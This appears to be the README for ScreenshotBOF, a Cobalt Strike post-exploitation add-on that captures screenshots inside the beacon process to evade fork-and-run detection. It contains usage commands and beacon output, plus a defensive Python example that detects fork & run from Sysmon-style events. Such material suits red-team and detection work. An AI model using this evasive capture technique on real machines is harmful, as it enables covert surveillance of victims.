ScreenshotBOF: alternative screenshot capability for Cobalt Strike

ScreenshotBOF

An alternative screenshot capability for Cobalt Strike that calls the WinAPI directly from the beacon process and does not perform a fork & run. The screenshot is captured and downloaded in memory; nothing has to touch disk unless you choose the drop-to-disk save method.

Changelog v2.0

  • JPEG is used in place of BMP
  • Moved to mingw
  • Added beacon screenshot callback option
  • Removed BMP renderer (it will be missed)
  • Supports capturing of minimized windows

Why did I make this?

Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the built-in screenshot command: the beacon spawns a sacrificial process and injects the post-ex code into it. While this behavior provides stability (a crash takes down the sacrificial process, not the beacon), the spawn-then-inject pattern is now well known and heavily monitored. This BOF runs inline in the beacon process instead and is meant to provide a more OPSEC-safe version of the screenshot capability.
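To make "heavily monitored" concrete, here is an added example (not part of the ScreenshotBOF project) of the kind of detection logic that catches fork & run: it pairs a process-creation event with a remote-thread creation from the new process's parent shortly afterwards. The events are constructed Sysmon-style records (event ID 1 = ProcessCreate, 8 = CreateRemoteThread), the process names and PIDs are hypothetical, and the 5-second window is an assumed tuning value. An inline BOF like this one produces no such pair, which is the OPSEC argument the paragraph above makes; it still leaves the capture API calls and the outbound transfer in the beacon host process, so it is quieter, not invisible.

```python
from datetime import datetime

# Constructed Sysmon-style events for illustration only (not real telemetry).
# Event IDs follow Sysmon: 1 = ProcessCreate, 8 = CreateRemoteThread.
SAMPLE_EVENTS = [
    # A beacon-hosting process (hypothetical name) spawns a sacrificial
    # rundll32.exe with no arguments and injects a thread into it one second
    # later: the fork & run shape.
    {"id": 1, "ts": "2024-03-01T10:00:00", "pid": 5100,
     "image": r"C:\Windows\System32\rundll32.exe", "cmdline": "rundll32.exe",
     "ppid": 4242, "parent_image": r"C:\Users\alice\AppData\Local\hostproc.exe"},
    {"id": 8, "ts": "2024-03-01T10:00:01", "source_pid": 4242, "target_pid": 5100,
     "target_image": r"C:\Windows\System32\rundll32.exe"},
    # Benign: explorer launches notepad; nobody creates a thread in it.
    {"id": 1, "ts": "2024-03-01T10:05:00", "pid": 6000,
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt",
     "ppid": 3000, "parent_image": r"C:\Windows\explorer.exe"},
    # A remote thread into a long-running process with no matching recent
    # ProcessCreate from that source: not the fork & run shape, must not pair.
    {"id": 8, "ts": "2024-03-01T10:30:00", "source_pid": 7000, "target_pid": 3000,
     "target_image": r"C:\Windows\explorer.exe"},
]


def _ts(s):
    return datetime.fromisoformat(s)


def is_argless_spawn(cmdline):
    """True when the command line is only the executable name (e.g. 'rundll32.exe').
    Sacrificial post-ex processes are typically started with no arguments."""
    return len(cmdline.strip().split()) == 1


def detect_fork_and_run(events, window_seconds=5):
    """Pair a ProcessCreate (id 1) with a CreateRemoteThread (id 8) whose source
    is the new process's parent and which happens within window_seconds of the
    spawn. Returns one alert dict per such pair (none for inline BOF activity)."""
    creates = {e["pid"]: e for e in events if e["id"] == 1}
    alerts = []
    for e in events:
        if e["id"] != 8:
            continue
        child = creates.get(e["target_pid"])
        if child is None or child["ppid"] != e["source_pid"]:
            continue
        delta = (_ts(e["ts"]) - _ts(child["ts"])).total_seconds()
        if 0 <= delta <= window_seconds:
            alerts.append({
                "parent_pid": child["ppid"],
                "parent_image": child["parent_image"],
                "child_pid": child["pid"],
                "child_image": child["image"],
                "seconds_after_spawn": delta,
                "argless_spawn": is_argless_spawn(child["cmdline"]),
            })
    return alerts


if __name__ == "__main__":
    for a in detect_fork_and_run(SAMPLE_EVENTS):
        print(f"fork & run: {a['parent_image']} (pid {a['parent_pid']}) -> "
              f"{a['child_image']} (pid {a['child_pid']}), thread injected "
              f"{a['seconds_after_spawn']:.0f}s after spawn, argless={a['argless_spawn']}")
```

Run as-is and the only alert is the rundll32 pair; the benign notepad spawn and the unpaired remote thread stay silent. Real pipelines key on more than PID (PID reuse, process GUIDs, access masks from event 10), but the parent-spawns-then-injects correlation is the core of why the stock fork & run screenshot is noisy.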

Self Compilation

  1. git clone the repo: git clone https://github.com/CodeXTF2/ScreenshotBOF.git
  2. open the solution in Visual Studio
  3. Build project BOF (the v2.0 changelog notes a move to mingw, so check the repository for the current build method before relying on the Visual Studio solution)

Save methods (the numeric argument passed to the command):

  0. drop file to disk on the target
  1. download file over beacon (Cobalt Strike only; nothing is written to disk)

Usage

  1. import the screenshotBOF.cna script into Cobalt Strike
  2. use the command screenshot_bof {local filename} {save method 0/1}, for example:

     beacon> screenshot_bof sad.bmp 1
     [*] Running screenshot BOF by (@codex_tf2)
     [+] host called home, sent: 5267 bytes
     [+] received output:
     [*] Screen saved to bitmap
     [+] received output:
     [*] Downloading bitmap over beacon with filename sad.bmp
     [*] started download of sad.bmp

  3. if downloaded over beacon, the BMP can be viewed in Cobalt Strike by right-clicking the download and clicking "Render BMP" (credit @BinaryFaultline). Note that this applies to the pre-v2.0 workflow: the v2.0 changelog above states that output is now JPEG and the BMP renderer was removed.

Source: https://github.com/CodeXTF2/
